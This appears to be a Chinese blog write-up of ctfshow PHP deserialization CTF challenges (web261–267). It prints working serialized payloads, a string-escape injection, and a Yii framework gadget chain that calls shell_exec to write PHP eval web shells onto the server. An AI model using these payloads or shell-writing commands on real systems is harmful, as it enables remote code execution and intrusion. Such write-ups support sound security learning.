[ctfshow]web入门——反序列化
ctfshow :https://ctf.show/challenges#web261-721
群主的视频wp :https://www.bilibili.com/video/BV1D64y1m78f
本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主 看看ヾ(@ ˘ω˘ @)ノ!!
反序列化 unserialization
web261
<?php
highlight_file(__FILE__);
class ctfshowvip{
public $username;
public $password;
public $code;
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
public function __wakeup(){ //因为有__unserialize魔术方法,wakeup被绕过了
if($this->username!='' || $this->password!=''){
die('error');
}
}
public function __invoke(){ //invoke调用不到,eval没法利用
eval($this->code);
}
public function __sleep(){
$this->username='';
$this->password='';
}
public function __unserialize($data){
$this->username=$data['username'];
$this->password=$data['password'];
$this->code = $this->username.$this->password;
}
public function __destruct(){
if($this->code==0x36d){
file_put_contents($this->username, $this->password);
}
}
}
unserialize($_GET['vip']);
$this->code==0x36d是弱类型比较,0x36d没有引号代表数字,十六进制0x36d转为十进制是877
我们只要让a=877.php,b为一句话木马即可
<?php
class ctfshowvip{
public $username;
public $password;
public $code;
public function __construct($u='877.php',$p='<?php eval($_POST[a]);?>'){
$this->username=$u;
$this->password=$p;
}
}
echo urlencode(serialize(new ctfshowvip()))
?>
payload
O%3A10%3A%22ctfshowvip%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22877.php %22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5Ba%5D%29%3B%3F%3E%22%3Bs%3A4%3A%22code%22%3BN%3B%7D
成功写入,连接即可
web264
str_replace字符串覆盖逃逸
<?php
@message.php
error_reporting(0);
session_start();
class message{
public $from;
public $msg;
public $to;
public $token='user';
public function __construct($f,$m,$t){
$this->from = $f;
$this->msg = $m;
$this->to = $t;
}
}
$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];
if(isset($f) && isset($m) && isset($t)){
$msg = new message($f,$m,$t);
$umsg = str_replace('fuck', 'loveU', serialize($msg));
$_SESSION['msg']=base64_encode($umsg);
echo 'Your message has been sent';
}
highlight_file(__FILE__);
message.php
<?php
session_start();
highlight_file(__FILE__);
include('flag.php');
class message{
public $from;
public $msg;
public $to;
public $token='user';
public function __construct($f,$m,$t){
$this->from = $f;
$this->msg = $m;
$this->to = $t;
}
}
if(isset($_COOKIE['msg'])){
$msg = unserialize(base64_decode($_SESSION['msg'])); //session中取message
if($msg->token=='admin'){
echo $flag;
}
}
我们需要$token='admin';经过序列化是这样的s:5:"token";s:5:"admin";,加上闭合";s:5:"token";s:5:"admin";}一共27个字符,每次替换增加一个字符,需要27个fuck吃掉构造函数的$token='user';
payload:
?f=1&m=1&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}
之后在访问message.php,加上cookie即可
web265
error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
public $token;
public $password;
public function __construct($t,$p){
$this->token=$t;
$this->password = $p;
}
public function login(){
return $this->token===$this->password;
}
}
$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand());
if($ctfshow->login()){
echo $flag;
}
要让$this->token===$this->password,token的值我们不知道,可以用引用类型$this->password = &$this->token;
<?php
class ctfshowAdmin{
public $token;
public $password;
public function __construct($t='',$p=''){
$this->token=$t;
$this->password = &$this->token;
}
}
echo serialize(new ctfshowAdmin())
?>
payload
O:12:"ctfshowAdmin":2:{s:5:"token";s:0:"";s:8:"password";R:2;}
web266
highlight_file(__FILE__);
include('flag.php');
$cs = file_get_contents('php://input');
class ctfshow{
public $username='xxxxxx';
public $password='xxxxxx';
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
public function login(){
return $this->username===$this->password;
}
public function __toString(){
return $this->username;
}
public function __destruct(){
global $flag;
echo $flag;
}
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
throw new Exception("Error $ctfshowo",1);
}
$cs = file_get_contents('php://input'); post传参即可
<?php
class ctfshow{
public $username='xxxxxx';
public $password='xxxxxx';
}
echo serialize(new ctfshow())
?>
因为if(preg_match('/ctfshow/', $cs)){,而序列化时候大小写不敏感,所以改成cTfshow
payload
O:7:"cTfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}
web267
yii系列
源码可以看出是yii框架
admin/admin登陆
about界面源码中多了一个注释<!--?view-source -->
get传数据/index.php?r=site%2Fabout&view-source
///backdoor/shell
unserialize(base64_decode($_GET['code']))
找个yii利用链
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'phpinfo';
$this->id = '1';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}
namespace yii\db{
use Faker\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
system无回显,利用dnslog,命令执行
得到web目录/var/www/html/basic/web
然后写shell,折磨死我了,改了好多遍
注意$要转义,system用不了要换执行的函数
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'shell_exec';
$this->id = "echo '<?php eval(\$_POST[g]);?>' > /var/www/html/basic/web/3.php";
}
}
}
本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主 看看ヾ(@ ˘ω˘ @)ノ!!